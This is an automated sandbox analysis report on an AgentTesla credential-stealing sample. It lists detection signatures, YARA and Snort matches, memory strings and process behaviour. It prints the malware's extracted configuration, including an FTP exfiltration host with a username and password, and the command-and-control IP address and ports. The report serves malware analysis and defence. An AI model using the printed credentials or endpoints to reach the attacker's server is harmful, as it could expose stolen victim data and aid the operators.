Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Analysis ID:1460072
MD5:b3db9023fe215f9cc7ea9dc71387f111
SHA1:a46281d24cb8b7101a3307d10d81ac93a3e3abc4
SHA256:e67fccc9c4055f580dd361b3224a292ad2eb2b4f625b123a4f36872564c8c81b
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 6 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32f9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3300d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33097:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33129:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33193:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33205:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3329b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3332b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x304d0:$s2: GetPrivateProfileString
                  • 0x2fbf2:$s3: get_OSFullName
                  • 0x31187:$s5: remove_Key
                  • 0x31324:$s5: remove_Key
                  • 0x3220e:$s6: FtpWebRequest
                  • 0x32f7d:$s7: logins
                  • 0x334ef:$s7: logins
                  • 0x36200:$s7: logins
                  • 0x362b2:$s7: logins
                  • 0x37bba:$s7: logins
                  • 0x36e56:$s9: 1.85 (Hash, version 2, native byte-order)
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:06/20/24-14:23:09.712885
                    SID:2855542
                    Source Port:49709
                    Destination Port:43985
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-14:23:09.311887
                    SID:2029927
                    Source Port:49708
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-14:23:09.712885
                    SID:2851779
                    Source Port:49709
                    Destination Port:43985
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeAvira: detected
                    Found malware configuration
                    Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeVirustotal: Detection: 35%Perma Link
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeReversingLabs: Detection: 50%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49708 -> 108.179.234.136:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49709 -> 108.179.234.136:43985
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49709 -> 108.179.234.136:43985
                    Source: global trafficTCP traffic: 192.168.2.5:49709 -> 108.179.234.136:43985
                    Source: Joe Sandbox ViewIP Address: 108.179.234.136 108.179.234.136
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknownFTP traffic detected: 108.179.234.136:21 -> 192.168.2.5:49708 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 07:23. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 07:23. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 07:23. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: ftp.wapination.net
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.wapination.net
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wapination.net
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, SKTzxzsJw.cs.Net Code: Fe9wfWKc5

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, Resource1.csLarge array initialization: : array initializer size 583319
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.5900000.5.raw.unpack, PingPong.csLarge array initialization: : array initializer size 12418
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_07F506600_2_07F50660
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_0133E02C0_2_0133E02C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_055800400_2_05580040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_055800060_2_05580006
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085C78500_2_085C7850
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085C9DCF0_2_085C9DCF
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085C00400_2_085C0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085C42700_2_085C4270
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085C32800_2_085C3280
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085CD2D00_2_085CD2D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 0_2_085CD2C10_2_085CD2C1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_01879BC03_2_01879BC0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_01874A603_2_01874A60
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_01873E483_2_01873E48
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_0187CE503_2_0187CE50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_018741903_2_01874190
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_067256E03_2_067256E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_067200403_2_06720040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_06722EF83_2_06722EF8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_06723F583_2_06723F58
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_0672DC203_2_0672DC20
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_0672BD003_2_0672BD00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_06729AE03_2_06729AE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_06728B803_2_06728B80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_0672364B3_2_0672364B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeCode function: 3_2_067250003_2_06725000
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2050545309.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2062036493.0000000007ED0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.0000000004247000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2061025024.0000000005900000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000000.2039660820.0000000000D10000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelWVk.exe. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283328492.00000000012F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeBinary or memory string: OriginalFilenamelWVk.exe. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, aZvWosTDY5WcGlwOCb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, aZvWosTDY5WcGlwOCb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMutant created: NULL
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeVirustotal: Detection: 35%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
